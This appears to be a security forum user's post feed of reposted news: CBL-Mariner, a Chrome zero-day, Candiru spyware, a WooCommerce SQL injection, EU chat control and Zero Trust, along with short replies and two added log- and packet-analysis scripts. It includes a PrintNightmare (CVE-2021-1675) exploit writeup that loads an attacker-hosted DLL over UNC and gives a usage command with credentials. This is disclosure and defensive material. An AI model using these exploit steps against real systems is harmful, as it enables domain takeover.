Everything posted by Nytro
Say hi to Microsoft's own Linux: CBL-Mariner

Microsoft has its own Linux distribution and, yes, you can download, install and run it. In fact, you may want to do just that.

By Steven J. Vaughan-Nichols for Linux and Open Source | July 16, 2021 -- 12:27 GMT (13:27 BST) | Topic: Edge Computing

Ok, so it's not named MS-Linux or Lindows, but Microsoft now has its very own, honest-to-goodness general-purpose Linux distribution: Common Base Linux, (CBL)-Mariner. And, just like any Linux distro, you can download it and run it yourself. Amazing, isn't it? Why, the next thing you know, Microsoft will let you run Windows applications on Linux! Oh, wait, it has!

One more time with feeling: listen to yours truly and Linus Torvalds, Microsoft is no longer Linux's enemy. The enemy of AWS and Google? You bet. But Linux, no.

Take, for example, CBL-Mariner. Microsoft didn't make a big fuss about releasing CBL-Mariner. It quietly released the code on GitHub and anyone can use it. Indeed, Juan Manuel Rey, a Microsoft Senior Program Manager for Azure VMware, recently published a guide on how to build an ISO CBL-Mariner image. Before this, if you were a Linux expert, with a spot of work you could run it, but now, thanks to Rey, anyone with a bit of Linux skill can do it.

CBL-Mariner is not a Linux desktop. Like Azure Sphere, Microsoft's first specialized Linux distro, which is used for securing edge computing services, it's a server-side Linux. This Microsoft-branded Linux is an internal Linux distribution. It's meant for Microsoft's cloud infrastructure and edge products and services. Its main job is to provide a consistent Linux platform for these devices and services. Just like Fedora is to Red Hat, it keeps Microsoft on Linux's cutting edge.

CBL-Mariner is built around the idea that you only need a small common core set of packages to address the needs of cloud and edge services. If you need more, CBL-Mariner also makes it easy to layer additional packages on top of its common core. Once that's done, its simple build system easily enables you to create RPM packages from SPEC and source files. Or you can also use it to create ISOs or Virtual Hard Disk (VHD) images.

As you'd expect, the basic CBL-Mariner is a very lightweight Linux. You can use it as a container or a container host. With its limited size also comes a minimal attack surface. This also makes it easy to deploy security patches to it via RPM. Its designers make a particular point of delivering the latest security patches and fixes to its users. For more about its security features, see CBL-Mariner's GitHub security features list.

Like any other Linux distro, CBL-Mariner is built on the shoulders of giants. Microsoft credits VMware's Photon OS Project, a secure Linux; The Fedora Project; Linux from Scratch -- a guide to building Linux from source; the OpenMamba distro; and, yes, even GNU and the Free Software Foundation (FSF). I know it galls some of you that Microsoft acknowledges the FSF, but this is not the '90s and Steve "Linux is a cancer" Ballmer hasn't been Microsoft's CEO since 2014.

To try it for yourself, you'll build it on Ubuntu 18.04. Frankly, I'd be surprised if you couldn't build it on any Ubuntu Linux distro from 18.04 on up. I did it on my Ubuntu 20.04.2 desktop. You'll also need the latest version of the Go language and Docker.

Even though the default build system is Ubuntu, CBL-Mariner itself owes a large debt to Fedora. For example, it uses Tiny DNF as its DNF RPM package manager. For its atomic image-based update mechanism it uses RPM-OSTree.

So, if you want a secure, stable Linux for your edge computing or container needs, I suggest -- in all seriousness -- you give CBL-Mariner a try. While I continue to have my doubts about Windows as a serious operating system, Microsoft did a fine job of creating a solid Linux. Who would have guessed!

Source: https://www.zdnet.com/article/say-hi-to-microsofts-own-linux-cbl-mariner/
Google patches 8th Chrome zero-day exploited in the wild this year

By Sergiu Gatlan, July 16, 2021

Google has released Chrome 91.0.4472.164 for Windows, Mac, and Linux to fix seven security vulnerabilities, one of them a high severity zero-day vulnerability exploited in the wild.

"Google is aware of reports that an exploit for CVE-2021-30563 exists in the wild," the company revealed.

The new Chrome release has started rolling out worldwide to the Stable desktop channel and will become available to all users over the following days. Google Chrome will automatically update itself on the next launch, but you can also manually update it by checking for the newly released version from Settings > Help > 'About Google Chrome.'

Eighth exploited zero-day patched this year

The zero-day patched on Thursday and reported by Google Project Zero's Sergei Glazunov is described as a type confusion bug in V8, Google's open-source, C++-based, high-performance WebAssembly and JavaScript engine.

Even though type confusion weaknesses would generally lead to browser crashes following successful exploitation by reading or writing memory out of the bounds of the buffer, they can also be exploited by threat actors to execute arbitrary code on devices running vulnerable software.

While Google said that it is aware of in-the-wild exploitation of CVE-2021-30563, it did not share info regarding these attacks, to allow the security update to deploy on as many systems as possible before more threat actors start actively abusing it.

"Access to bug details and links may be kept restricted until a majority of users are updated with a fix," Google said. "We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed."

In all, Google has patched eight Chrome zero-day bugs exploited by attackers in the wild since the start of 2021. Besides CVE-2021-30563, the company previously addressed:

- CVE-2021-21148 - February 4th, 2021
- CVE-2021-21166 - March 2nd, 2021
- CVE-2021-21193 - March 12th, 2021
- CVE-2021-21220 - April 13th, 2021
- CVE-2021-21224 - April 20th, 2021
- CVE-2021-30551 - June 9th, 2021
- CVE-2021-30554 - June 17th, 2021

More details on previously patched Chrome zero-days

The Google Threat Analysis Group (TAG) shared additional details earlier this week regarding in-the-wild exploitation of the CVE-2021-21166 and CVE-2021-30551 Chrome zero-days.

"Based on our analysis, we assess that the Chrome and Internet Explorer exploits described here were developed and sold by the same vendor providing surveillance capabilities to customers around the world," Google said.

On Thursday, Microsoft and Citizen Lab linked the vendor mentioned in Google TAG's report to Israeli spyware vendor Candiru. Threat actors deployed the surveillance vendor's spyware to infect iOS, Android, macOS, and Windows devices using Chrome zero-days and unpatched Windows flaws.

Microsoft researchers found that Candiru's malware was used to compromise the systems of "politicians, human rights activists, journalists, academics, embassy workers, and political dissidents." In all, Microsoft said it discovered "at least 100 victims in Palestine, Israel, Iran, Lebanon, Yemen, Spain, United Kingdom, Turkey, Armenia, and Singapore."

Source: https://www.bleepingcomputer.com/news/security/google-patches-8th-chrome-zero-day-exploited-in-the-wild-this-year/
Microsoft: Several governments used a spyware program made in Israel. Politicians, dissidents and journalists were among the targets

16.07.2021 11:03

A spyware program made by a company in Israel was used by several governments to monitor politicians, dissidents, journalists and human rights activists.

Several governments have used spyware tools developed by an Israeli company to monitor political officials, dissidents, journalists, academics and human rights activists, according to experts from Microsoft and Citizen Lab, quoted Thursday by AFP.

These powerful "weapons" were used against more than 100 people around the world, say a security official at Microsoft and Citizen Lab, an organization based at the University of Toronto. Microsoft states that it has modified its Windows operating system to fix the flaws exploited by the Israeli group, according to Agerpres.

This is a particularly discreet company based in Tel Aviv that sells exclusively to governments spyware (a category of malicious software) that can infect smartphones, computers and cloud computing services (on-demand access to hardware and software resources over the internet), according to Citizen Lab. Its official name is currently Saito Tech Ltd, but it is better known as Candiru.

Researchers at Citizen Lab found evidence that the spyware managed to extract information from several applications used by the victims, including Gmail, Skype, Telegram and Facebook. The software can also look at the targeted persons' internet search history, as well as their passwords, and can activate their devices' camera and microphone.

Microsoft, for its part, points out that it has identified victims of this software in the Palestinian territories, Israel, Lebanon, Yemen, Spain, the United Kingdom, Turkey, Armenia and Singapore.

According to the IT giant, which named the spyware "DevilsTongue", the latter managed to infiltrate popular sites such as Facebook, Twitter, Gmail and Yahoo to collect information, read the victims' messages and retrieve photos. The software was also able to send messages in the victims' names.

The American company has created "protections" to defend its products against incursions by this software developed by the Israeli group, which it calls Sourgum. "We have shared these protections with the security community so that we can collectively counter and mitigate this threat," Microsoft notes.

Editor: A.C.

Source: https://www.digi24.ro/stiri/externe/microsoft-mai-multe-guverne-au-folosit-un-program-de-spionaj-facut-in-israel-printre-tinte-au-fost-politicieni-disidenti-jurnalisti-1600429
Hi, I have no details about such companies. I would expect people to learn things there; I don't know how much that diploma you get matters, but as far as I remember the courses stretch over an enormous amount of time. If, for example, a course lasts 6 months... In 6 months you can learn to design rockets (if you don't work just 2 hours a week).
Critical SQL Injection Vulnerability Patched in WooCommerce
Nytro posted a topic in Stiri securitate
This entry was posted in Vulnerabilities, WordPress Security on July 15, 2021 by Ram Gall

Update: The article originally credited Tommy DeVoss (dawgyg) for the discovery. We've since been contacted by Tommy, who let us know that the credit should go to another researcher, Josh from DOS (Development Operations Security).

On July 14, 2021, WooCommerce released an emergency patch for a SQL Injection vulnerability reported by a security researcher, Josh from DOS (Development Operations Security), based in Richmond, Virginia. This vulnerability allowed unauthenticated attackers to access arbitrary data in an online store's database.

WooCommerce is the leading e-Commerce platform for WordPress and is installed on over 5 million websites. Additionally, the WooCommerce Blocks feature plugin, installed on over 200,000 sites, was affected by the vulnerability and was patched at the same time.

The Wordfence Threat Intelligence team was able to develop proofs of concept for time-based and boolean-based blind injections and released an initial firewall rule to our Premium customers within hours of the patch. We released an additional firewall rule to cover a separate variant of the same attack the next day, on July 15, 2021. Sites still running the free version of Wordfence will receive the same protection after 30 days, on August 13 and August 14, 2021.

We strongly recommend updating to a patched version of WooCommerce immediately if you have not been updated automatically, as this will provide the best possible protection. The vulnerability affects versions 3.3 to 5.5 of the WooCommerce plugin and versions 2.5 to 5.5 of the WooCommerce Blocks plugin.

WooCommerce Responded Immediately

In the announcement by WooCommerce, Beau Lebens, the Head of Engineering for WooCommerce, stated, "Upon learning about the issue, our team immediately conducted a thorough investigation, audited all related codebases, and created a patch fix for every impacted version (90+ releases) which was deployed automatically to vulnerable stores."

Due to the critical nature of the vulnerability, the WordPress.org team is pushing forced automatic updates to vulnerable WordPress installations using these plugins. Store owners using older versions can update to the latest version in their branch. For example, if your storefront is using WooCommerce version 5.3, you can update to version 5.3.1 to minimize the risk of compatibility issues. Within the security announcement from WooCommerce, there is a table detailing the 90 patched versions of WooCommerce. Additionally, WooCommerce has a helpful guide for WooCommerce updates.

Has This Been Exploited in the Wild?

While the original researcher has indicated that this vulnerability has been exploited in the wild, Wordfence Threat Intelligence has found extremely limited evidence of these attempts and it is likely that such attempts were highly targeted. If you think you have been exploited due to this vulnerability, the WooCommerce team is recommending administrative password resets after updating to provide additional protection.

If you do believe that your site may have been affected, a review of your log files may show indications. Look for a large number of repeated requests to /wp-json/wc/store/products/collection-data or ?rest_route=/wc/store/products/collection-data in your log files. Query strings which include %2525 are an indicator that this vulnerability may have been exploited on your site.

Improving Security of the WordPress Ecosystem

Sites with e-Commerce functionality are a high-value target for many attackers, so it is critical that vulnerabilities in e-Commerce platforms are addressed promptly to minimize the potential damage that can be caused. With the growth of both WordPress and WooCommerce, more security researchers have turned their attention to WordPress-related products. The rapid and deep response that the WooCommerce team performed in protecting WooCommerce users is a great sign for the ongoing security of e-Commerce in the open source WordPress ecosystem.

Source: https://www.wordfence.com/blog/2021/07/critical-sql-injection-vulnerability-patched-in-woocommerce/
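The log review described in the article, written out as an added example (not Wordfence's or WooCommerce's code): it scans combined-format access log lines for the two request shapes the post names and reports, per client IP, how many collection-data requests it made and how many carried `%2525`. The log lines and the repeat threshold are constructed assumptions.

```python
"""Access-log check for the WooCommerce indicators given in the article.

Added example, not Wordfence's or WooCommerce's code. It flags clients that
(a) hit /wp-json/wc/store/products/collection-data or
    ?rest_route=/wc/store/products/collection-data many times, or
(b) send that endpoint a query string containing %2525 (a double-encoded
    percent sign), the indicator named in the post.
The log lines and the repeat threshold below are constructed assumptions.
"""
import re
from collections import Counter, defaultdict

COLLECTION_DATA_MARKERS = (
    "/wp-json/wc/store/products/collection-data",
    "rest_route=/wc/store/products/collection-data",
)
DOUBLE_ENCODED = "%2525"
REPEAT_THRESHOLD = 20  # assumed; tune to the store's normal Store API traffic

# Apache/nginx combined log format: client IP ... [time] "METHOD target HTTP/x"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)


def parse_line(line):
    """Return (ip, method, target) or None for lines that are not request records."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), m.group("method"), m.group("target")


def is_collection_data_request(target):
    return any(marker in target for marker in COLLECTION_DATA_MARKERS)


def has_double_encoding(target):
    return DOUBLE_ENCODED in target


def scan(lines):
    """Count collection-data requests per IP and collect the targets carrying %2525."""
    hits = Counter()
    double_encoded = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, _method, target = parsed
        if not is_collection_data_request(target):
            continue
        hits[ip] += 1
        if has_double_encoding(target):
            double_encoded[ip].append(target)
    return hits, double_encoded


def report(lines, threshold=REPEAT_THRESHOLD):
    """Map flagged IP -> {'requests': n, 'double_encoded': m}.

    An IP is flagged by volume (>= threshold collection-data requests) or by
    even one %2525 query string, which the post treats as an indicator on its own.
    """
    hits, double_encoded = scan(lines)
    flagged = {}
    for ip, n in hits.items():
        m = len(double_encoded.get(ip, []))
        if n >= threshold or m:
            flagged[ip] = {"requests": n, "double_encoded": m}
    return flagged


# Constructed sample: one client probing with %2525, one hammering the endpoint,
# one ordinary shopper. Query parameter names are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Jul/2021:10:00:01 +0000] "GET /wp-json/wc/store/products/collection-data?attr=%2525 HTTP/1.1" 200 512',
    '203.0.113.7 - - [15/Jul/2021:10:00:02 +0000] "GET /?rest_route=/wc/store/products/collection-data&attr=%2525 HTTP/1.1" 200 512',
    '203.0.113.7 - - [15/Jul/2021:10:00:03 +0000] "GET /?rest_route=/wc/store/products/collection-data&attr=%2525%2525 HTTP/1.1" 200 512',
    '192.0.2.5 - - [15/Jul/2021:10:00:04 +0000] "GET /wp-json/wc/store/products?per_page=10 HTTP/1.1" 200 2048',
    '192.0.2.5 - - [15/Jul/2021:10:00:05 +0000] "GET /shop/ HTTP/1.1" 200 8192',
] + [
    f'198.51.100.9 - - [15/Jul/2021:10:01:{i:02d} +0000] "GET /wp-json/wc/store/products/collection-data?page={i} HTTP/1.1" 200 300'
    for i in range(25)
]

if __name__ == "__main__":
    for ip, info in sorted(report(SAMPLE_LOG).items()):
        print(f"{ip}: {info['requests']} collection-data requests, {info['double_encoded']} with %2525")
```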
#CHATCONTROL: EU PARLIAMENT APPROVES MASS SURVEILLANCE OF PRIVATE COMMUNICATIONS

JULY 6, 2021

Brussels, 06/07/2021 – Today, the European Parliament approved the ePrivacy Derogation, allowing providers of e-mail and messaging services to automatically search all personal messages of each citizen for presumed suspect content and report suspected cases to the police. The European Pirates Delegation in the Greens/EFA group strongly condemns this automated mass surveillance, which effectively means the end of privacy in digital correspondence. Pirate Party MEPs plan to take legal action.

In today's vote, 537 Members of the European Parliament approved Chatcontrol, with 133 voting against and 20 abstentions.[1] According to police data, in the vast majority of cases, innocent citizens come under suspicion of having committed an offence due to unreliable processes. In a recent representative poll, 72% of EU citizens opposed general monitoring of their messages.[2] While providers will initially have a choice to search or not to search communications, follow-up legislation, expected in autumn, is to oblige all communications service providers to indiscriminate screening.

Breyer: "This harms children rather than protecting them"

German Pirate Party Member of the European Parliament Patrick Breyer, shadow rapporteur on the legislative proposal, comments:

*"The adoption of the first ever EU regulation on mass surveillance is a sad day for all those who rely on free and confidential communications and advice, including abuse victims and press sources. The regulation deals a death blow to the confidentiality of digital correspondence. It is a general breach of the dam to permit indiscriminate surveillance of private spaces by corporations – by this totalitarian logic, our post, our smartphones or our bedrooms could also be generally monitored. Unleashing such denunciation machines on us is ineffective, illegal and irresponsible. Indiscriminate searches will not protect children and even endanger them by exposing their private photos to unknown persons, and by criminalising children themselves. Already overburdened investigators are kept busy with having to sort out thousands of criminally irrelevant messages. The victims of such a terrible crime as child sexual abuse deserve measures that prevent abuse in the first place. The right approach would be, for example, to intensify undercover investigations into child porn rings and reduce the years-long processing backlogs in searches and evaluations of seized data."*

Marcel Kolaja, Czech Pirate Party MEP and Vice-President of the European Parliament, comments: "Post officers also do not open your private letters to see if you're sending anything objectionable. The same rule should apply online. However, what this exception will do is irrevocable damage to our fundamental right to privacy. Moreover, monitoring across large platforms will only lead to criminals moving to platforms where chat control will be technically impossible. As a result, innocent people will be snooped on a daily basis while tracking down criminals will fail."

Pirates plan legal action against the regulation

The EU's plans for chat control have been confirmed to violate fundamental rights by a former judge of the European Court of Justice.[3] Patrick Breyer plans to take legal action against the regulation and is looking for victims of abuse who would file such a complaint. "Abuse victims are particularly harmed by this mass surveillance", explains Breyer. "To be able to speak freely about the abuse they have suffered and seek help in a safe space is critical to victims of sexualised violence. They depend on the possibility to communicate safely and confidentially. These safe spaces are now being taken away from them, which will prevent victims from seeking help and support."

The European Commission has already announced a follow-up regulation to make chat control mandatory for all email and messaging providers. Previously secure end-to-end encrypted messenger services such as Whatsapp or Signal would be forced to install a backdoor. There is a considerable backlash against these plans: a public consultation carried out by the EU Commission revealed that 51% of all respondents oppose chat control for e-mail and messaging providers. 80% of respondents do not want chat control to be applied to encrypted messages.[4] Due to the resistance, EU Commissioner for Home Affairs Ylva Johansson has postponed the proposal until September 2021.

More Information on Chatcontrol: www.chatcontrol.eu

[1]
[2] https://www.patrick-breyer.de/en/poll-72-of-citizens-oppose-eu-plans-to-search-all-private-messages-for-allegedly-illegal-material-and-report-to-the-police/
[3] https://www.patrick-breyer.de/wp-content/uploads/2021/03/Legal-Opinion-Screening-for-child-pornography-2021-03-04.pdf
[4] https://ec.europa.eu/info/law/better-regulation/have-your-say/initiatives/12726-Child-sexual-abuse-online-detection-removal-and-reporting-/public-consultation_de

Source: https://european-pirateparty.eu/parliament-approves-chatcontrol/
It looks like there are a lot of requests to port 27016 containing "....TSource Engine Query..". I took 3 random IPs and it seems one such packet comes from each IP, no more. I'm thinking the source IP is spoofed, but it's possible the packet itself is necessary. A quick test would be blocking these packets, BUT something could break (or everything, and it stops working altogether).
A theoretical solution, though one that would take some time, would be the following:

1. Monitor performance and catch such an attack while it is happening
2. Start a tcpdump and capture packets for a certain period, say 2-5 minutes
3. Analyze it and see which packets are pouring in
4. Block them (but check that nothing breaks)

Another possible solution would be logs from the CS servers, if they exist. If they can be switched to a more "verbose" mode, that's ideal. Maybe, somehow, lots of log entries show up with certain things. Have you tried SYN cookies? https://tldp.org/LDP/solrhe/Securing-Optimizing-Linux-RH-Edition-v1.3/chap5sec56.html

Actually, I think CS uses UDP, as far as I know. That means the DDoS can theoretically be "amplified" through various vulnerabilities in servers on the Internet, but the packets are not valid. Better take such a tcpdump and, if you think it doesn't contain anything "sensitive", you can give it to us to look over. We don't guarantee we'll find anything, but we can try.

PS: If CS is only on port 27.001 you could capture just the data on that port, but it would be useful to look at the others too; who knows what else is going on there.
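The capture-and-analyze steps from the reply above, as an added example that is not from the thread: it takes UDP packet records already pulled out of a tcpdump capture (a constructed sample is embedded), counts A2S_INFO "TSource Engine Query" packets per source address on port 27016, and flags the pattern described earlier in the thread, many sources each sending exactly one query. The thresholds are assumed values to be tuned against normal traffic.

```python
"""Per-source analysis of A2S_INFO traffic on a Source Engine game port.

Added example, not from the thread. It works on packet records already
extracted from a tcpdump capture, as (time_s, src_ip, dst_port, payload),
and reports how many "TSource Engine Query" packets arrived, from how many
sources, and how many sources sent exactly one, which is the pattern the
thread describes. The packet records and thresholds are constructed/assumed.
"""
from collections import Counter

# A2S_INFO request: 0xFFFFFFFF header, 'T', "Source Engine Query", NUL (25 bytes)
A2S_INFO_PAYLOAD = b"\xff\xff\xff\xff" + b"TSource Engine Query\x00"
GAME_PORT = 27016  # the port named in the thread


def is_a2s_info(payload):
    """The fixed 25-byte query, optionally followed by a 4-byte challenge."""
    if not payload.startswith(A2S_INFO_PAYLOAD):
        return False
    return len(payload) in (len(A2S_INFO_PAYLOAD), len(A2S_INFO_PAYLOAD) + 4)


def summarize(packets, port=GAME_PORT):
    """Aggregate A2S_INFO packets sent to `port` over the capture window."""
    per_src = Counter()
    first = last = None
    packets_on_port = 0
    for t, src, dport, payload in packets:
        if dport != port:
            continue
        packets_on_port += 1
        if not is_a2s_info(payload):
            continue
        per_src[src] += 1
        first = t if first is None else min(first, t)
        last = t if last is None else max(last, t)
    total = sum(per_src.values())
    span = (last - first) if total and last > first else 1.0
    return {
        "packets_on_port": packets_on_port,
        "a2s_info": total,
        "sources": len(per_src),
        "single_packet_sources": sum(1 for c in per_src.values() if c == 1),
        "queries_per_second": total / span,
    }


def looks_like_spoofed_flood(summary, qps_threshold=50.0, single_fraction=0.9):
    """High query rate and nearly every source sends exactly one packet (assumed cut-offs)."""
    if summary["sources"] == 0:
        return False
    frac = summary["single_packet_sources"] / summary["sources"]
    return summary["queries_per_second"] >= qps_threshold and frac >= single_fraction


def build_sample():
    """Constructed capture: one real client plus 200 one-shot sources within 2 seconds."""
    pkts = [
        (0.0, "10.0.0.5", GAME_PORT, A2S_INFO_PAYLOAD),
        (0.5, "10.0.0.5", GAME_PORT, A2S_INFO_PAYLOAD + b"\x01\x02\x03\x04"),  # with challenge
        (0.6, "10.0.0.5", GAME_PORT, b"\xff\xff\xff\xffU\xff\xff\xff\xff"),    # A2S_PLAYER, not counted
        (0.7, "10.0.0.6", 27015, A2S_INFO_PAYLOAD),                            # other port, ignored
    ]
    for i in range(200):
        net = "198.51.100" if i < 100 else "203.0.113"
        pkts.append((1.0 + i * 0.01, f"{net}.{i % 100 + 1}", GAME_PORT, A2S_INFO_PAYLOAD))
    return pkts


if __name__ == "__main__":
    s = summarize(build_sample())
    print(s, "flood" if looks_like_spoofed_flood(s) else "normal")
```

Blocking by payload, as the thread warns, may break legitimate server browsing, so the per-source counts are the point: a real client repeats the query while the flood sources do not.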
Hi, have you tried talking to the Voxility people? They might know what it is and how to stop it. If not, we'll have to see how that junk works, so you know what to stop and how; a few iptables rules should probably be enough, I don't expect it to be anything particularly sophisticated.
I'm no hardware expert, but when I compared 2 processors I used this: https://cpu.userbenchmark.com/Compare/Intel-Core-i7-3610QM-vs-Intel-Core-i7-2600/2730vs620 and went by that "Speed rank". But a real comparison depends on many aspects, and on a laptop more than just the processor matters.
My goal in this video is to make RSA as easy to understand (and perform) as possible. The math can get a little complicated, so I try to go step by step and explain every operation. If you have any questions, feel free to leave a comment and I'll get back to you as soon as I can. If you enjoyed the video, remember to like and share. If you want to see more content like this in the future, consider subscribing. Thanks for watching!
SonicWall & Fortinet MiTM (Man-in-the-Middle) credentials interceptor
Nytro replied to TheSecurityNerd's topic in Exploituri
Well, I think the code can be used for more than Fortinet and SonicWall; it looks pretty generic and easy to implement in a project.
PrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service

Ten years ago, an escalation of privilege bug in the Windows Print Spooler was used in Stuxnet, the notorious worm that destroyed Iran's nuclear enrichment centrifuges and infected more than 45000 networks. In the past ten years, the spooler has still had an endless stream of vulnerabilities disclosed, some of which are not known to the world; however, they are hidden bombs that could lead to disasters. Therefore, we have focused on the spooler over the past months and reaped fruitfully.

The beginning of the research is PrintDemon, from which we got our inspiration. After digging into this bug deeper, we found a way to bypass the patch of MS. But just after MS released the new version, we immediately found a new way to exploit it again. After the story of PrintDemon, we realized that the spooler is still a good attack surface, although security researchers have hunted for bugs in the spooler for more than ten years. We started to explore the inner workings of the Printer Spooler and discovered some 0-day bugs in it. Some of them are more powerful than PrintDemon and easier to exploit, and the others can be triggered remotely, which could lead to remote code execution.

CVE-2021-1675 is a remote code execution in the Windows Print Spooler. According to the MSRC security bulletin, this vulnerability was reported by Zhipeng Huo, Piotr Madej and Zhang Yunhai. We also found this bug before and hoped to keep it secret to participate in Tianfu Cup ☹. As some people have already published an exploit video of CVE-2021-1675, here we publish our writeup and exploit for CVE-2021-1675. For more RCE and LPE vulnerabilities in the Windows Spooler, please stay tuned and wait for our Black Hat talk 'Diving Into Spooler: Discovering LPE and RCE Vulnerabilities in Windows Printer'.

RpcAddPrinterDriver

Adding a Printer Driver to a Server (RpcAddPrinterDriver)

Let's check what MS-RPRN: Print System Remote Protocol says about the RpcAddPrinterDriver call. To add or update a printer driver ("OEM Printer Driver") to a print server ("CORPSERV"), a client ("TESTCLT") performs the following steps.

The client can use the RPC call RpcAddPrinterDriver to add a driver to the print server. The client ensures that the files for the printer driver are in a location accessible to the server. For that purpose, the client can share a local directory containing the files, or use [MS-SMB] to place the files into a directory on the server. The client then allocates and populates a DRIVER_INFO_2 structure as follows:

```c
pName = L"OEM Printer Driver";
pEnvironment = L"Windows NT x86"; /* Environment the driver is compatible with */
pDriverPath = "\\CORPSERV\C$\DRIVERSTAGING\OEMDRV.DLL";
pDataFile = "\\CORPSERV\C$\DRIVERSTAGING\OEMDATA.DLL";
pConfigFile = "\\CORPSERV\C$\DRIVERSTAGING\OEMUI.DLL";
```

The client allocates a DRIVER_CONTAINER driverContainer structure and initializes it to contain the DRIVER_INFO_2 structure. The client calls RpcAddPrinterDriver:

```c
RpcAddPrinterDriver( L"\\CORPSERV", &driverContainer );
```

CVE-2021-1675 Analysis

Clearly, if an attacker can bypass the authentication of RpcAddPrinterDriver, he could install a malicious driver on the print server. According to MSDN, the client needs SeLoadDriverPrivilege to call the RPC. However, this isn't true. Let's check the authentication logic here:

ValidateObjectAccess is a normal security check for the Spooler Service. But in lines 19 and 20, argument a4 is user controllable. So a normal user can bypass the security check and add a driver. If you are in the domain, a normal domain user can connect to the Spooler service on the DC and install a driver on the DC. Then he can fully control the Domain.

Exploit

But the real attack is not that simple. To exploit the authentication bypass bug, we need to understand what the Spooler service will do when you call RpcAddPrinterDriver. Suppose you supply these three paths to the service:

```
pDataFile   = A.dll
pConfigFile = \\attackerip\Evil.dll
pDriverPath = C.dll
```

It will copy A, B and C into the folder C:\Windows\System32\spool\drivers\x64\3\new. Then it will copy them to C:\Windows\System32\spool\drivers\x64\3, and load C:\Windows\System32\spool\drivers\x64\3\A.dll and C:\Windows\System32\spool\drivers\x64\3\C.dll into the Spooler service. However, in the latest version, Spooler will check to make sure that A and C are not UNC paths. But as B can be a UNC path, we can set pConfigFile to a UNC path (an evil DLL). This will make our Evil.dll be copied to C:\Windows\System32\spool\drivers\x64\3\Evil.dll. Then call RpcAddPrinterDriver again, setting pDataFile to C:\Windows\System32\spool\drivers\x64\3\Evil.dll. It will load our evil DLL.

Unfortunately, it does not work, because if you set A, B, C in the folder C:\Windows\System32\spool\drivers\x64\3, there will be an access conflict in the file copy. To bypass this, we need to use the backup feature of driver upgrade. If we upgrade some driver, the old version will be backed up into the C:\Windows\System32\spool\drivers\x64\3\old\1\ folder. Then we can bypass the access conflict and successfully inject our evil.dll into the spooler service.

Successfully loaded our dll:

Usage

```
.\PrintNightmare.exe dc_ip path_to_exp user_name password
```

Example:

```
.\PrintNightmare.exe 192.168.5.129 \\192.168.5.197\test\MyExploit.dll user2 test123##
```

Tested on Windows Server 2019 1809 17763.1518

Impact

This vulnerability can be used to achieve LPE and RCE. As for the RCE part, you need a user authenticated to the Spooler service. However, this is still critical in a Domain environment. Because normally the DC will have the Spooler service enabled, a compromised domain user may use this vulnerability to control the DC.

There are more hidden bombs in Spooler which are not publicly known. We will share more RCE and LPE vulnerabilities in the Windows Spooler; please stay tuned and wait for our Black Hat talk 'Diving Into Spooler: Discovering LPE and RCE Vulnerabilities in Windows Printer'.

Credit: Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)

Source: https://github.com/afwu/PrintNightmare
The new trend: https://twitter.com/hashtag/InfoSecBikini?src=hashtag_click
June 30, 2021 The critical role of Zero Trust in securing our world Vasu Jakkal Corporate Vice President, Security, Compliance and Identity Share We are operating in the most complex cybersecurity landscape that we’ve ever seen. While our current ability to detect and respond to attacks has matured incredibly quickly in recent years, bad actors haven’t been standing still. Large-scale attacks like those pursued by Nobelium1 and Hafnium, alongside ransomware attacks on critical infrastructure indicate that attackers have become increasingly sophisticated and coordinated. It is abundantly clear that the work of cybersecurity and IT departments are critical to our national and global security. Microsoft has a unique level of access to data on cyber threats and attacks globally, and we are committed to sharing this information and insights for the greater good. As illustrated by recent attacks, we collaborate across the public and private sectors, as well as with our industry peers and partners, to create a stronger, more intelligent cybersecurity community for the protection of all. This collaborative relationship includes the United States government, and we celebrate the fast-approaching milestones of the US Cybersecurity Executive Order2 (EO). The EO specifies concrete actions to strengthen national cybersecurity and address increasingly sophisticated threats across federal agencies and the entire digital ecosystem. This order directs agencies and their suppliers to improve capabilities and coordination on information sharing, incident detection, incident response, software supply chain security, and IT modernization, which we support wholeheartedly. With these national actions set in motion and a call for all businesses to enhance cybersecurity postures, Microsoft and our extensive partner ecosystem stand ready to help protect our world. 
The modern framework for protecting critical infrastructure, minimizing future incidents, and creating a safer world already exists: Zero Trust. We have helped many public and private organizations to establish and implement a Zero Trust approach, especially in the wake of the remote and hybrid work tidal wave of 2020-2021. And Microsoft remains committed to delivering comprehensive, integrated security solutions at scale and supporting customers on every step of their security journey, including detailed guidance for Zero Trust deployment. Zero Trust’s critical role in helping secure our world The evidence is clear—the old security paradigm of building an impenetrable fortress around your resources and data is simply not viable against today’s challenges. Remote and hybrid work realities mean people move fluidly between work and personal lives, across multiple devices, and with increased collaboration both inside and outside of organizational boundaries. Entry points for attacks—identities, devices, apps, networks, infrastructure, and data—live outside the protections of traditional perimeters. The modern digital estate is distributed, diverse, and complex. This new reality requires a Zero Trust approach. Section 3 of the EO calls for “decisive steps” for the federal government “to modernize its approach to cybersecurity” by accelerating the move to secure cloud services and Zero Trust implementation, including a mandate of multifactor authentication and end-to-end encryption of data. We applaud this recognition of the Zero Trust strategy as a cybersecurity best practice, as well as the White House encouragement of the private sector to take “ambitious measures” in the same direction as the EO guidelines. Per Section 3, federal standards and guidance for Zero Trust are developed by the National Institute of Standards and Technology (NIST) of the US Department of Commerce, similar to other industry and scientific innovation measurements. 
NIST has defined Zero Trust in terms of several basic tenets:

- All resource authentication and authorization are dynamic and strictly enforced before access is allowed.
- Access to trust in the requester is evaluated before the access is granted.
- Access should also be granted with the least privileges needed to complete the task.
- Assets should always act as if an attacker is present on the enterprise network.

At Microsoft, we have distilled these Zero Trust tenets into three principles: verify explicitly, use least privileged access, and assume breach. We use these principles for our strategic guidance to customers, software development, and global security posture.

Organizations that operate with a Zero Trust mentality are more resilient, consistent, and responsive to new attacks. A true end-to-end Zero Trust strategy not only makes it harder for attackers to get into the network but also minimizes potential blast radius by preventing lateral movement. While preventing bad actors from gaining access is critical, it’s only part of the Zero Trust equation. Being able to detect a sophisticated actor inside your environment is key to minimizing the impact of a breach. Sophisticated threat intelligence and analytics are critical for a rapid assessment of an attacker’s behavior, eviction, and remediation.

